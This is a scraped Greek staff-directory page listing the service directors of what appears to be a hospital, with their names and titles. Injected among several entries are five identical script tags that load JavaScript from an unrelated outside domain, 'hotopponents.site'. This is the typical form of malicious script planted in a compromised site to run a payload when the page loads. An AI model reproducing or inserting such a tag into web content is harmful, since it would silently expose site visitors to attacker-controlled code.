Διευθυντές Υπηρεσιών

gen_dieuth

Κων/νος Εμμανουηλίδης

Γενικός Διευθυντής
stauropoulou

Ευαγγελία Σταυροπούλου

Δ/ντρια Οικονομικών Υπ.
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Δημήτριος Ματάμης

Δ/ντης Ιατρικής Υπηρεσίας
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Γρηγόρης Σοφιαλίδης

Δ/ντής Τεχνικής Υπηρεσίας
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Αθανασία Χούτα-Χυτήρη

Δ/ντρια ΝοσηλευτικήςΥπ.
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Βασίλης Δασκαλάκης

Δ/ντής Υπ. Πληροφορικής
xarizani1

Χαρίκλεια Χαριζάνη

Δ/ντρια Διοικητικής Υπ.
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Λιάνα Μιχαηλίδου

Δ/ντρια Ποιοτικού Ελέγχου